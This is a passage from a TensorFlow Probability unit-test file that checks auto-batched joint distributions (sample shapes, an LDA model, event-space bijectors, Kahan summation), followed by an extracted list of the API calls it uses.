seed=test_util.test_seed(sampler_type=sampler_type)))
self.assertAllEqual(xs[0], v0)
self.assertAllEqual(xs[1].shape,
[value_partial_batch_dim, num_columns])
self.assertAllEqual(xs[2].shape,
[value_partial_batch_dim, num_rows, num_columns])
def test_unit_sample_shape_avoids_vectorization(self):
xs = [] # Collect (possibly symbolic) Tensors sampled inside the model.
@tfd.JointDistributionCoroutineAutoBatched
def dist():
x = yield tfd.Normal(0., 1., name='x')
xs.append(x)
# Try sampling with a variety of unit sample shapes.
self.assertEqual(
[1],
dist.sample(
1, seed=test_util.test_seed(sampler_type='seedless')).x.shape)
self.assertEqual(
[1],
dist.sample([1],
seed=test_util.test_seed(sampler_type='seedless')).x.shape)
self.assertEqual(
[1, 1],
dist.sample([1, 1],
seed=test_util.test_seed(sampler_type='seedless')).x.shape)
# Check that the model only ever saw the trivial sample shape.
for x in xs:
self.assertEqual(x.shape, [])
def test_unit_sample_shape(self):
@tfd.JointDistributionCoroutineAutoBatched
def dist():
x = yield tfd.Normal(loc=tf.zeros([3]), scale=1., name='x')
yield tfd.Bernoulli(logits=tf.einsum('n->', x), name='y')
for sample_shape in [(), 1, [1], [1, 1], [2]]:
self.assertAllEqual(
dist.log_prob(
dist.sample(sample_shape,
seed=test_util.test_seed())).shape,
np.reshape(sample_shape, [-1]))
def test_sample_dtype_structures_output(self):
num_features = 4
def dist():
scale_variance = yield Root(tfd.InverseGamma(0.5, 0.5))
scale_noncentered = yield Root(
tfd.Sample(tfd.HalfNormal(1.), num_features))
scale = scale_noncentered * scale_variance[..., None]**0.5
weights_noncentered = yield Root(
tfd.Sample(tfd.Normal(0., 1.), num_features))
yield tfd.Deterministic(weights_noncentered * scale)
# Currently sample_dtype is only used for `tf.nest.pack_structure_as`. In
# the future we may use it for error checking and/or casting.
sample_dtype = collections.namedtuple('Model', [
'scale_variance',
'scale_noncentered',
'weights_noncentered',
'weights',
])(*([None]*4))
joint = tfd.JointDistributionCoroutineAutoBatched(
dist, sample_dtype=sample_dtype, validate_args=True)
self.assertAllEqual(sorted(sample_dtype._fields),
sorted(joint.sample(
seed=test_util.test_seed())._fields))
ds, xs = joint.sample_distributions(seed=test_util.test_seed())
tf.nest.assert_same_structure(sample_dtype, ds)
tf.nest.assert_same_structure(sample_dtype, xs)
self.assertEqual([3, 4], joint.log_prob(joint.sample(
[3, 4], seed=test_util.test_seed())).shape)
def test_repr_with_custom_sample_dtype(self):
sd = collections.namedtuple('Model', ['s', 'w'])(None, None)
def dist():
s = yield tfd.Sample(tfd.InverseGamma(2, 2), 100)
yield tfd.Normal(0, s)
m = tfd.JointDistributionCoroutineAutoBatched(dist, sample_dtype=sd)
self.assertEqual(
('<tfp.distributions.JointDistributionCoroutineAutoBatched'
' \'JointDistributionCoroutineAutoBatched\''
' batch_shape=[]'
' event_shape=Model(s=[100], w=[100])'
' dtype=Model(s=float32, w=float32)>'),
repr(m))
@parameterized.named_parameters(
{'testcase_name': 'coroutine',
'jd_class': tfd.JointDistributionCoroutineAutoBatched},
{'testcase_name': 'sequential',
'jd_class': tfd.JointDistributionSequentialAutoBatched},
{'testcase_name': 'named',
'jd_class': tfd.JointDistributionNamedAutoBatched})
@test_util.jax_disable_variable_test
def test_latent_dirichlet_allocation(self, jd_class): # pylint: disable=g-doc-args
"""Tests Latent Dirichlet Allocation joint model.
The LDA generative process can be written as:
```none
N[i] ~ Poisson(xi)
theta[i] ~ Dirichlet(alpha)
Z[i] ~ Multinomial(N[i], theta[i])
for k in 1...K:
X[i,k] ~ Multinomial(Z[i, k], beta[j])
```
Typically `xi` is specified and `alpha`, `beta` are fit using type-II
maximum likelihood estimators.
Reference: http://www.jmlr.org/papers/volume3/blei03a/blei03a.pdf
"""
seed = test_util.test_seed_stream()
# Hyperparameters.
num_topics = 3
num_words = 10
avg_doc_length = 5
u = tfd.Uniform(low=-1., high=1.)
alpha = tfp.util.TransformedVariable(
u.sample([num_topics], seed=seed()),
tfb.Softplus(), name='alpha')
beta = tf.Variable(u.sample([num_topics, num_words],
seed=seed()), name='beta')
# Note near 1:1 with mathematical specification. The main distinction is the
# use of Independent--this lets us easily aggregate multinomials across
# topics (and in any "shape" of documents).
def lda_coroutine_model():
n = yield Root(tfd.Poisson(rate=avg_doc_length))
theta = yield Root(tfd.Dirichlet(concentration=alpha))
z = yield tfd.Multinomial(total_count=n, probs=theta)
yield tfd.Multinomial(total_count=z, logits=beta)
if jd_class is tfd.JointDistributionCoroutineAutoBatched:
model = lda_coroutine_model
elif jd_class is tfd.JointDistributionSequentialAutoBatched:
model = [
tfd.Poisson(rate=avg_doc_length), # n
tfd.Dirichlet(concentration=alpha), # theta
lambda theta, n: tfd.Multinomial(total_count=n, probs=theta), # z
lambda z: tfd.Multinomial(total_count=z, logits=beta)
]
elif jd_class is tfd.JointDistributionNamedAutoBatched:
model = collections.OrderedDict((
('n', tfd.Poisson(rate=avg_doc_length)),
('theta', tfd.Dirichlet(concentration=alpha)),
('z', lambda theta, n: tfd.Multinomial(total_count=n, probs=theta)),
('X', lambda z: tfd.Multinomial(total_count=z, logits=beta))))
# TODO(b/159842104): Enable autovectorization for Multinomial sampling.
lda = jd_class(model, validate_args=True, use_vectorized_map=False)
# Now, let's sample some "documents" and compute the log-prob of each.
docs_shape = [2, 4] # That is, 8 docs in the shape of [2, 4].
sample = lda.sample(docs_shape, seed=seed())
log_probs = lda.log_prob(sample)
self.assertEqual(docs_shape, log_probs.shape)
# Verify we correctly track trainable variables.
self.assertLen(lda.trainable_variables, 2)
self.assertIs(alpha.pretransformed_input, lda.trainable_variables[0])
self.assertIs(beta, lda.trainable_variables[1])
# Ensure we can compute gradients.
with tf.GradientTape() as tape:
# Note: The samples are not taped, hence implicitly "stop_gradient."
negloglik = -lda.log_prob(sample)
grads = tape.gradient(negloglik, lda.trainable_variables)
self.assertLen(grads, 2)
self.assertAllEqual((alpha.pretransformed_input.shape, beta.shape),
(grads[0].shape, grads[1].shape))
self.assertAllNotNone(grads)
@parameterized.named_parameters(
{'testcase_name': 'coroutine',
'jd_class': tfd.JointDistributionCoroutineAutoBatched},
{'testcase_name': 'sequential',
'jd_class': tfd.JointDistributionSequentialAutoBatched},
{'testcase_name': 'named',
'jd_class': tfd.JointDistributionNamedAutoBatched})
def test_default_event_space_bijector(self, jd_class):
models = {}
def coroutine_model():
high = yield tfd.LogNormal(0., [1.])
yield tfd.Uniform(low=[[-1., -2.]], high=high[..., tf.newaxis])
yield tfd.Deterministic([[0., 1., 2.]])
models[tfd.JointDistributionCoroutineAutoBatched] = coroutine_model
models[tfd.JointDistributionSequentialAutoBatched] = [
tfd.LogNormal(0., [1.]),
lambda high: tfd.Uniform(low=[[-1., -2.]], high=high[..., tf.newaxis]),
tfd.Deterministic([[0., 1., 2.]])
]
models[tfd.JointDistributionNamedAutoBatched] = collections.OrderedDict((
('high', tfd.LogNormal(0., [1.])),
('x', lambda high: tfd.Uniform(low=[[-1., -2.]], # pylint: disable=g-long-lambda
high=high[..., tf.newaxis])),
('y', tfd.Deterministic([[0., 1., 2.]]))))
joint = jd_class(models[jd_class], batch_ndims=1, validate_args=True)
self.assertAllEqual(joint.batch_shape, [1])
self.assertAllEqualNested(tf.nest.flatten(joint.event_shape),
[[], [2], [3]])
joint_bijector = joint.experimental_default_event_space_bijector()
y = self.evaluate(joint.sample([2, 3], seed=test_util.test_seed()))
x = joint_bijector.inverse(y)
self.assertAllCloseNested(y, joint_bijector.forward(x))
fldj = joint_bijector.forward_log_det_jacobian(
x, event_ndims=tf.nest.pack_sequence_as(joint.dtype, [0, 1, 2]))
ildj = joint_bijector.inverse_log_det_jacobian(
y, event_ndims=tf.nest.pack_sequence_as(joint.dtype, [0, 1, 1]))
self.assertAllEqual(fldj.shape, joint.log_prob(y).shape)
self.assertAllClose(fldj, -ildj)
# Passing inputs *without* batch shape should return sane outputs.
y = self.evaluate(joint.sample([], seed=test_util.test_seed()))
# Strip the sample to represent just a single event.
unbatched_y = tf.nest.map_structure(lambda t: t[0, ...], y)
self.assertAllEqualNested(tf.nest.map_structure(tf.shape, unbatched_y),
joint.event_shape_tensor())
ildj = joint_bijector.inverse_log_det_jacobian(
unbatched_y,
event_ndims=tf.nest.pack_sequence_as(joint.dtype, [0, 1, 1]))
self.assertAllEqual(ildj.shape, joint.log_prob(unbatched_y).shape)
@parameterized.named_parameters(
{'testcase_name': 'coroutine',
'jd_class': tfd.JointDistributionCoroutineAutoBatched},
{'testcase_name': 'sequential',
'jd_class': tfd.JointDistributionSequentialAutoBatched},
{'testcase_name': 'named',
'jd_class': tfd.JointDistributionNamedAutoBatched})
def test_default_event_space_bijector_constant_jacobian(self, jd_class):
models = {}
def coroutine_model():
yield tfd.Normal(0., [1., 2.], name='x')
models[tfd.JointDistributionCoroutineAutoBatched] = coroutine_model
models[tfd.JointDistributionSequentialAutoBatched] = [
tfd.Normal(0., [1., 2.], name='x')
]
models[tfd.JointDistributionNamedAutoBatched] = {
'x': tfd.Normal(0., [1., 2.], name='x')}
joint = jd_class(models[jd_class], batch_ndims=1, validate_args=True)
self.assertAllEqual(joint.batch_shape, [2])
joint_bijector = joint.experimental_default_event_space_bijector()
y = self.evaluate(joint.sample([3], seed=test_util.test_seed()))
x = joint_bijector.inverse(y)
self.assertAllCloseNested(y, joint_bijector.forward(x))
fldj = joint_bijector.forward_log_det_jacobian(x)
ildj = joint_bijector.inverse_log_det_jacobian(y)
self.assertAllEqual(fldj.shape, joint.log_prob(y).shape)
self.assertAllClose(fldj, -ildj)
def test_nested_joint_distributions(self):
batch_shape = [2, 3]
def inner_fn():
xy = yield tfd.JointDistributionNamedAutoBatched(
{'x': tfd.Normal(loc=tf.zeros(batch_shape),
scale=tf.ones(batch_shape),
name='x'),
'y': lambda x: tfd.Poisson(log_rate=x, name='y')},
batch_ndims=2,
name='xy')
_ = yield tfd.Normal(loc=0., scale=xy['y'], name='z')
joint = tfd.JointDistributionSequentialAutoBatched([
tfd.JointDistributionCoroutineAutoBatched(inner_fn,
batch_ndims=1,
name='a')])
z = joint.sample(seed=test_util.test_seed())
# Batch and event shape.
self.assertAllEqual(joint.batch_shape, [])
self.assertAllEqualNested(
tf.nest.map_structure(lambda x: tf.TensorShape(x.shape), z),
joint.event_shape)
# Sample shape.
z2 = self.evaluate(
joint.sample(5, seed=test_util.test_seed()))
lp2 = joint.log_prob(z2)
self.assertAllEqual(lp2.shape, [5])
z3 = joint.sample(value=z2, seed=test_util.test_seed())
self.assertAllCloseNested(z2, z3)
@parameterized.named_parameters(*[
dict(testcase_name='_{}{}'.format(jd_class.__name__, # pylint: disable=g-complex-comprehension
'_jit' if jit else ''),
jd_class=jd_class, jit=jit)
for jd_class in (tfd.JointDistributionCoroutineAutoBatched,
tfd.JointDistributionSequentialAutoBatched,
tfd.JointDistributionNamedAutoBatched)
for jit in (False, True)
])
def test_kahan_precision(self, jd_class, jit):
maybe_jit = lambda f: f
if jit:
self.skip_if_no_xla()
if not JAX_MODE and not tf.test.is_gpu_available():
self.skipTest('b/179303849')
maybe_jit = tf.function(jit_compile=True)
def make_models(dtype):
models = {}
def mk_20k_poisson(log_rate):
return tfd.Poisson(log_rate=tf.broadcast_to(log_rate[..., tf.newaxis],
log_rate.shape + (20_000,)))
def coroutine_model():
log_rate = yield tfd.Normal(0., dtype(.2), name='log_rate')
yield mk_20k_poisson(log_rate).copy(name='x')
models[tfd.JointDistributionCoroutineAutoBatched] = coroutine_model
models[tfd.JointDistributionSequentialAutoBatched] = [
tfd.Normal(0., dtype(.2)), mk_20k_poisson
]
models[tfd.JointDistributionNamedAutoBatched] = collections.OrderedDict((
('log_rate', tfd.Normal(0., dtype(.2))), ('x', mk_20k_poisson)))
return models
joint = jd_class(make_models(np.float32)[jd_class], validate_args=True,
experimental_use_kahan_sum=True)
joint64 = jd_class(make_models(np.float64)[jd_class], validate_args=True)
stream = test_util.test_seed_stream()
nsamp = 7
xs = self.evaluate(
joint.sample(log_rate=tf.zeros([nsamp]), seed=stream()))
if isinstance(xs, dict):
xs['log_rate'] = tfd.Normal(0, .2).sample(nsamp, seed=stream())
else:
xs = (tfd.Normal(0, .2).sample(nsamp, seed=stream()), xs[1])
xs64 = tf.nest.map_structure(lambda x: tf.cast(x, tf.float64), xs)
lp = maybe_jit(joint.copy(validate_args=not jit).log_prob)(xs)
lp64 = joint64.log_prob(xs64)
lp, lp64 = self.evaluate((tf.cast(lp, tf.float64), lp64))
# Without Kahan, example max-abs-diff: ~0.06
self.assertAllClose(lp64, lp, rtol=0., atol=.01)
def test_kahan_broadcasting_check(self):
def model():
_ = yield tfd.Normal(0., 1.) # Batch shape ()
_ = yield tfd.Normal([0., 1., 2.], 1.) # Batch shape [3]
dist = tfd.JointDistributionCoroutineAutoBatched(
model, validate_args=True, experimental_use_kahan_sum=True,
batch_ndims=1)
sample = self.evaluate(dist.sample(seed=test_util.test_seed(
sampler_type='stateless')))
with self.assertRaises(ValueError):
self.evaluate(dist.log_prob(sample))
if __name__ == '__main__':
# TODO(b/173158845): XLA:CPU reassociates away the Kahan correction term.
os.environ['XLA_FLAGS'] = '--xla_cpu_enable_fast_math=false'
test_util.main()
| [
"tensorflow.compat.v2.nest.map_structure",
"numpy.log",
"tensorflow.compat.v2.einsum",
"tensorflow_probability.python.internal.test_util.jax_disable_test_missing_functionality",
"tensorflow.compat.v2.cast",
"tensorflow.compat.v2.nest.pack_sequence_as",
"tensorflow.compat.v2.nest.assert_same_structure",
... | [((1233, 1535), 'absl.testing.parameterized.named_parameters', 'parameterized.named_parameters', (["{'testcase_name': 'coroutine', 'jd_class': tfd.\n JointDistributionCoroutineAutoBatched}", "{'testcase_name': 'sequential', 'jd_class': tfd.\n JointDistributionSequentialAutoBatched}", "{'testcase_name': 'named', 'jd_class': tfd.JointDistributionNamedAutoBatched}"], {}), "({'testcase_name': 'coroutine', 'jd_class':\n tfd.JointDistributionCoroutineAutoBatched}, {'testcase_name':\n 'sequential', 'jd_class': tfd.JointDistributionSequentialAutoBatched},\n {'testcase_name': 'named', 'jd_class': tfd.\n JointDistributionNamedAutoBatched})\n", (1263, 1535), False, 'from absl.testing import parameterized\n'), ((6819, 7278), 'absl.testing.parameterized.named_parameters', 'parameterized.named_parameters', (["{'testcase_name': 'coroutine', 'base_jd_class': tfd.\n JointDistributionCoroutine, 'jda_class': tfd.\n JointDistributionCoroutineAutoBatched}", "{'testcase_name': 'sequential', 'base_jd_class': tfd.\n JointDistributionSequential, 'jda_class': tfd.\n JointDistributionSequentialAutoBatched}", "{'testcase_name': 'named', 'base_jd_class': tfd.JointDistributionNamed,\n 'jda_class': tfd.JointDistributionNamedAutoBatched}"], {}), "({'testcase_name': 'coroutine',\n 'base_jd_class': tfd.JointDistributionCoroutine, 'jda_class': tfd.\n JointDistributionCoroutineAutoBatched}, {'testcase_name': 'sequential',\n 'base_jd_class': tfd.JointDistributionSequential, 'jda_class': tfd.\n JointDistributionSequentialAutoBatched}, {'testcase_name': 'named',\n 'base_jd_class': tfd.JointDistributionNamed, 'jda_class': tfd.\n JointDistributionNamedAutoBatched})\n", (6849, 7278), False, 'from absl.testing import parameterized\n'), ((11146, 11448), 'absl.testing.parameterized.named_parameters', 'parameterized.named_parameters', (["{'testcase_name': 'coroutine', 'jd_class': tfd.\n JointDistributionCoroutineAutoBatched}", "{'testcase_name': 'sequential', 'jd_class': tfd.\n JointDistributionSequentialAutoBatched}", "{'testcase_name': 'named', 'jd_class': tfd.JointDistributionNamedAutoBatched}"], {}), "({'testcase_name': 'coroutine', 'jd_class':\n tfd.JointDistributionCoroutineAutoBatched}, {'testcase_name':\n 'sequential', 'jd_class': tfd.JointDistributionSequentialAutoBatched},\n {'testcase_name': 'named', 'jd_class': tfd.\n JointDistributionNamedAutoBatched})\n", (11176, 11448), False, 'from absl.testing import parameterized\n'), ((13230, 13532), 'absl.testing.parameterized.named_parameters', 'parameterized.named_parameters', (["{'testcase_name': 'coroutine', 'jd_class': tfd.\n JointDistributionCoroutineAutoBatched}", "{'testcase_name': 'sequential', 'jd_class': tfd.\n JointDistributionSequentialAutoBatched}", "{'testcase_name': 'named', 'jd_class': tfd.JointDistributionNamedAutoBatched}"], {}), "({'testcase_name': 'coroutine', 'jd_class':\n tfd.JointDistributionCoroutineAutoBatched}, {'testcase_name':\n 'sequential', 'jd_class': tfd.JointDistributionSequentialAutoBatched},\n {'testcase_name': 'named', 'jd_class': tfd.\n JointDistributionNamedAutoBatched})\n", (13260, 13532), False, 'from absl.testing import parameterized\n'), ((15023, 15325), 'absl.testing.parameterized.named_parameters', 'parameterized.named_parameters', (["{'testcase_name': 'coroutine', 'jd_class': tfd.\n JointDistributionCoroutineAutoBatched}", "{'testcase_name': 'sequential', 'jd_class': tfd.\n JointDistributionSequentialAutoBatched}", "{'testcase_name': 'named', 'jd_class': tfd.JointDistributionNamedAutoBatched}"], {}), "({'testcase_name': 'coroutine', 'jd_class':\n tfd.JointDistributionCoroutineAutoBatched}, {'testcase_name':\n 'sequential', 'jd_class': tfd.JointDistributionSequentialAutoBatched},\n {'testcase_name': 'named', 'jd_class': tfd.\n JointDistributionNamedAutoBatched})\n", (15053, 15325), False, 'from absl.testing import parameterized\n'), ((17195, 17258), 'tensorflow_probability.python.internal.test_util.jax_disable_test_missing_functionality', 'test_util.jax_disable_test_missing_functionality', (['"""b/157594634"""'], {}), "('b/157594634')\n", (17243, 17258), False, 'from tensorflow_probability.python.internal import test_util\n'), ((17832, 17895), 'tensorflow_probability.python.internal.test_util.jax_disable_test_missing_functionality', 'test_util.jax_disable_test_missing_functionality', (['"""b/201586404"""'], {}), "('b/201586404')\n", (17880, 17895), False, 'from tensorflow_probability.python.internal import test_util\n'), ((27580, 27882), 'absl.testing.parameterized.named_parameters', 'parameterized.named_parameters', (["{'testcase_name': 'coroutine', 'jd_class': tfd.\n JointDistributionCoroutineAutoBatched}", "{'testcase_name': 'sequential', 'jd_class': tfd.\n JointDistributionSequentialAutoBatched}", "{'testcase_name': 'named', 'jd_class': tfd.JointDistributionNamedAutoBatched}"], {}), "({'testcase_name': 'coroutine', 'jd_class':\n tfd.JointDistributionCoroutineAutoBatched}, {'testcase_name':\n 'sequential', 'jd_class': tfd.JointDistributionSequentialAutoBatched},\n {'testcase_name': 'named', 'jd_class': tfd.\n JointDistributionNamedAutoBatched})\n", (27610, 27882), False, 'from absl.testing import parameterized\n'), ((31272, 31574), 'absl.testing.parameterized.named_parameters', 'parameterized.named_parameters', (["{'testcase_name': 'coroutine', 'jd_class': tfd.\n JointDistributionCoroutineAutoBatched}", "{'testcase_name': 'sequential', 'jd_class': tfd.\n JointDistributionSequentialAutoBatched}", "{'testcase_name': 'named', 'jd_class': tfd.JointDistributionNamedAutoBatched}"], {}), "({'testcase_name': 'coroutine', 'jd_class':\n tfd.JointDistributionCoroutineAutoBatched}, {'testcase_name':\n 'sequential', 'jd_class': tfd.JointDistributionSequentialAutoBatched},\n {'testcase_name': 'named', 'jd_class': tfd.\n JointDistributionNamedAutoBatched})\n", (31302, 31574), False, 'from absl.testing import parameterized\n'), ((33918, 34220), 'absl.testing.parameterized.named_parameters', 'parameterized.named_parameters', (["{'testcase_name': 'coroutine', 'jd_class': tfd.\n JointDistributionCoroutineAutoBatched}", "{'testcase_name': 'sequential', 'jd_class': tfd.\n JointDistributionSequentialAutoBatched}", "{'testcase_name': 'named', 'jd_class': tfd.JointDistributionNamedAutoBatched}"], {}), "({'testcase_name': 'coroutine', 'jd_class':\n tfd.JointDistributionCoroutineAutoBatched}, {'testcase_name':\n 'sequential', 'jd_class': tfd.JointDistributionSequentialAutoBatched},\n {'testcase_name': 'named', 'jd_class': tfd.\n JointDistributionNamedAutoBatched})\n", (33948, 34220), False, 'from absl.testing import parameterized\n'), ((39530, 39546), 'tensorflow_probability.python.internal.test_util.main', 'test_util.main', ([], {}), '()\n', (39544, 39546), False, 'from tensorflow_probability.python.internal import test_util\n'), ((5620, 5642), 'tensorflow.compat.v2.executing_eagerly', 'tf.executing_eagerly', ([], {}), '()\n', (5640, 5642), True, 'import tensorflow.compat.v2 as tf\n'), ((16614, 16659), 'tensorflow_probability.python.internal.test_util.test_seed', 'test_util.test_seed', ([], {'sampler_type': '"""stateless"""'}), "(sampler_type='stateless')\n", (16633, 16659), False, 'from tensorflow_probability.python.internal import test_util\n'), ((22191, 22245), 'tensorflow.compat.v1.placeholder_with_default', 'tf1.placeholder_with_default', (['sample_shape'], {'shape': 'None'}), '(sample_shape, shape=None)\n', (22219, 22245), True, 'import tensorflow.compat.v1 as tf1\n'), ((26791, 26838), 'tensorflow.compat.v2.nest.assert_same_structure', 'tf.nest.assert_same_structure', (['sample_dtype', 'ds'], {}), '(sample_dtype, ds)\n', (26820, 26838), True, 'import tensorflow.compat.v2 as tf\n'), ((26843, 26890), 'tensorflow.compat.v2.nest.assert_same_structure', 'tf.nest.assert_same_structure', (['sample_dtype', 'xs'], {}), '(sample_dtype, xs)\n', (26872, 26890), True, 'import tensorflow.compat.v2 as tf\n'), ((28516, 28544), 'tensorflow_probability.python.internal.test_util.test_seed_stream', 'test_util.test_seed_stream', ([], {}), '()\n', (28542, 28544), False, 'from tensorflow_probability.python.internal import test_util\n'), ((33520, 33565), 'tensorflow.compat.v2.nest.map_structure', 'tf.nest.map_structure', (['(lambda t: t[0, ...])', 'y'], {}), '(lambda t: t[0, ...], y)\n', (33541, 33565), True, 'import tensorflow.compat.v2 as tf\n'), ((38209, 38237), 'tensorflow_probability.python.internal.test_util.test_seed_stream', 'test_util.test_seed_stream', ([], {}), '()\n', (38235, 38237), False, 'from tensorflow_probability.python.internal import test_util\n'), ((6513, 6533), 'tensorflow.compat.v2.TensorShape', 'tf.TensorShape', (['None'], {}), '(None)\n', (6527, 6533), True, 'import tensorflow.compat.v2 as tf\n'), ((13199, 13224), 'numpy.exp', 'np.exp', (['expected_log_prob'], {}), '(expected_log_prob)\n', (13205, 13224), True, 'import numpy as np\n'), ((14924, 14944), 'tensorflow.compat.v2.math.log', 'tf.math.log', (['(1.0 + b)'], {}), '(1.0 + b)\n', (14935, 14944), True, 'import tensorflow.compat.v2 as tf\n'), ((21034, 21082), 'numpy.ones', 'np.ones', (['[value_partial_batch_dim, num_features]'], {}), '([value_partial_batch_dim, num_features])\n', (21041, 21082), True, 'import numpy as np\n'), ((21368, 21412), 'tensorflow.compat.v2.fill', 'tf.fill', (['[value_partial_batch_dim]', 'value[0]'], {}), '([value_partial_batch_dim], value[0])\n', (21375, 21412), True, 'import tensorflow.compat.v2 as tf\n'), ((21941, 22000), 'tensorflow.compat.v2.fill', 'tf.fill', (['(sample_shape + [value_partial_batch_dim])', 'value[0]'], {}), '(sample_shape + [value_partial_batch_dim], value[0])\n', (21948, 22000), True, 'import tensorflow.compat.v2 as tf\n'), ((22469, 22528), 'tensorflow.compat.v2.fill', 'tf.fill', (['(sample_shape + [value_partial_batch_dim])', 'value[0]'], {}), '(sample_shape + [value_partial_batch_dim], value[0])\n', (22476, 22528), True, 'import tensorflow.compat.v2 as tf\n'), ((23750, 23792), 'collections.namedtuple', 'collections.namedtuple', (['"""ValueSpec"""', "['a']"], {}), "('ValueSpec', ['a'])\n", (23772, 23792), False, 'import collections\n'), ((26279, 26389), 'collections.namedtuple', 'collections.namedtuple', (['"""Model"""', "['scale_variance', 'scale_noncentered', 'weights_noncentered', 'weights']"], {}), "('Model', ['scale_variance', 'scale_noncentered',\n 'weights_noncentered', 'weights'])\n", (26301, 26389), False, 'import collections\n'), ((27059, 27102), 'collections.namedtuple', 'collections.namedtuple', (['"""Model"""', "['s', 'w']"], {}), "('Model', ['s', 'w'])\n", (27081, 27102), False, 'import collections\n'), ((30871, 30888), 'tensorflow.compat.v2.GradientTape', 'tf.GradientTape', ([], {}), '()\n', (30886, 30888), True, 'import tensorflow.compat.v2 as tf\n'), ((32636, 32670), 'tensorflow.compat.v2.nest.flatten', 'tf.nest.flatten', (['joint.event_shape'], {}), '(joint.event_shape)\n', (32651, 32670), True, 'import tensorflow.compat.v2 as tf\n'), ((33596, 33640), 'tensorflow.compat.v2.nest.map_structure', 'tf.nest.map_structure', (['tf.shape', 'unbatched_y'], {}), '(tf.shape, unbatched_y)\n', (33617, 33640), True, 'import tensorflow.compat.v2 as tf\n'), ((37191, 37220), 'tensorflow.compat.v2.function', 'tf.function', ([], {'jit_compile': '(True)'}), '(jit_compile=True)\n', (37202, 37220), True, 'import tensorflow.compat.v2 as tf\n'), ((5431, 5477), 'tensorflow_probability.python.internal.test_util.test_seed', 'test_util.test_seed', ([], {'sampler_type': 'sampler_type'}), '(sampler_type=sampler_type)\n', (5450, 5477), False, 'from tensorflow_probability.python.internal import test_util\n'), ((6006, 6047), 'tensorflow.compat.v1.placeholder_with_default', 'tf1.placeholder_with_default', (['(1)'], {'shape': '[]'}), '(1, shape=[])\n', (6034, 6047), True, 'import tensorflow.compat.v1 as tf1\n'), ((6684, 6729), 'tensorflow_probability.python.internal.test_util.test_seed', 'test_util.test_seed', ([], {'sampler_type': '"""stateless"""'}), "(sampler_type='stateless')\n", (6703, 6729), False, 'from tensorflow_probability.python.internal import test_util\n'), ((10137, 10158), 'tensorflow_probability.python.internal.test_util.test_seed', 'test_util.test_seed', ([], {}), '()\n', (10156, 10158), False, 'from tensorflow_probability.python.internal import test_util\n'), ((14537, 14558), 'tensorflow_probability.python.internal.test_util.test_seed', 'test_util.test_seed', ([], {}), '()\n', (14556, 14558), False, 'from tensorflow_probability.python.internal import test_util\n'), ((15604, 15618), 'tensorflow.compat.v2.math.log', 'tf.math.log', (['y'], {}), '(y)\n', (15615, 15618), True, 'import tensorflow.compat.v2 as tf\n'), ((17650, 17671), 'tensorflow_probability.python.internal.test_util.test_seed', 'test_util.test_seed', ([], {}), '()\n', (17669, 17671), False, 'from tensorflow_probability.python.internal import test_util\n'), ((18345, 18366), 'tensorflow_probability.python.internal.test_util.test_seed', 'test_util.test_seed', ([], {}), '()\n', (18364, 18366), False, 'from tensorflow_probability.python.internal import test_util\n'), ((21120, 21142), 'tensorflow.compat.v2.cast', 'tf.cast', (['v', 'tf.float32'], {}), '(v, tf.float32)\n', (21127, 21142), True, 'import tensorflow.compat.v2 as tf\n'), ((21749, 21795), 'tensorflow_probability.python.internal.test_util.test_seed', 'test_util.test_seed', ([], {'sampler_type': 'sampler_type'}), '(sampler_type=sampler_type)\n', (21768, 21795), False, 'from tensorflow_probability.python.internal import test_util\n'), ((22142, 22161), 'tensorflow.compat.v2.ones', 'tf.ones', (['expect_shp'], {}), '(expect_shp)\n', (22149, 22161), True, 'import tensorflow.compat.v2 as tf\n'), ((22349, 22395), 'tensorflow_probability.python.internal.test_util.test_seed', 'test_util.test_seed', ([], {'sampler_type': 'sampler_type'}), '(sampler_type=sampler_type)\n', (22368, 22395), False, 'from tensorflow_probability.python.internal import test_util\n'), ((22670, 22689), 'tensorflow.compat.v2.ones', 'tf.ones', (['expect_shp'], {}), '(expect_shp)\n', (22677, 22689), True, 'import tensorflow.compat.v2 as tf\n'), ((25618, 25648), 'numpy.reshape', 'np.reshape', (['sample_shape', '[-1]'], {}), '(sample_shape, [-1])\n', (25628, 25648), True, 'import numpy as np\n'), ((26764, 26785), 'tensorflow_probability.python.internal.test_util.test_seed', 'test_util.test_seed', ([], {}), '()\n', (26783, 26785), False, 'from tensorflow_probability.python.internal import test_util\n'), ((33032, 33080), 'tensorflow.compat.v2.nest.pack_sequence_as', 'tf.nest.pack_sequence_as', (['joint.dtype', '[0, 1, 2]'], {}), '(joint.dtype, [0, 1, 2])\n', (33056, 33080), True, 'import tensorflow.compat.v2 as tf\n'), ((33157, 33205), 'tensorflow.compat.v2.nest.pack_sequence_as', 'tf.nest.pack_sequence_as', (['joint.dtype', '[0, 1, 1]'], {}), '(joint.dtype, [0, 1, 1])\n', (33181, 33205), True, 'import tensorflow.compat.v2 as tf\n'), ((33793, 33841), 'tensorflow.compat.v2.nest.pack_sequence_as', 'tf.nest.pack_sequence_as', (['joint.dtype', '[0, 1, 1]'], {}), '(joint.dtype, [0, 1, 1])\n', (33817, 33841), True, 'import tensorflow.compat.v2 as tf\n'), ((35994, 36015), 'tensorflow_probability.python.internal.test_util.test_seed', 'test_util.test_seed', ([], {}), '()\n', (36013, 36015), False, 'from tensorflow_probability.python.internal import test_util\n'), ((36426, 36447), 'tensorflow_probability.python.internal.test_util.test_seed', 'test_util.test_seed', ([], {}), '()\n', (36445, 36447), False, 'from tensorflow_probability.python.internal import test_util\n'), ((38560, 38582), 'tensorflow.compat.v2.cast', 'tf.cast', (['x', 'tf.float64'], {}), '(x, tf.float64)\n', (38567, 38582), True, 'import tensorflow.compat.v2 as tf\n'), ((38719, 38742), 'tensorflow.compat.v2.cast', 'tf.cast', (['lp', 'tf.float64'], {}), '(lp, tf.float64)\n', (38726, 38742), True, 'import tensorflow.compat.v2 as tf\n'), ((1816, 1838), 'tensorflow.compat.v2.expand_dims', 'tf.expand_dims', (['df', '(-1)'], {}), '(df, -1)\n', (1830, 1838), True, 'import tensorflow.compat.v2 as tf\n'), ((2132, 2154), 'tensorflow.compat.v2.expand_dims', 'tf.expand_dims', (['df', '(-1)'], {}), '(df, -1)\n', (2146, 2154), True, 'import tensorflow.compat.v2 as tf\n'), ((4092, 4114), 'tensorflow.compat.v2.expand_dims', 'tf.expand_dims', (['df', '(-1)'], {}), '(df, -1)\n', (4106, 4114), True, 'import tensorflow.compat.v2 as tf\n'), ((4420, 4442), 'tensorflow.compat.v2.expand_dims', 'tf.expand_dims', (['df', '(-1)'], {}), '(df, -1)\n', (4434, 4442), True, 'import tensorflow.compat.v2 as tf\n'), ((5873, 5895), 'tensorflow.compat.v2.expand_dims', 'tf.expand_dims', (['df', '(-1)'], 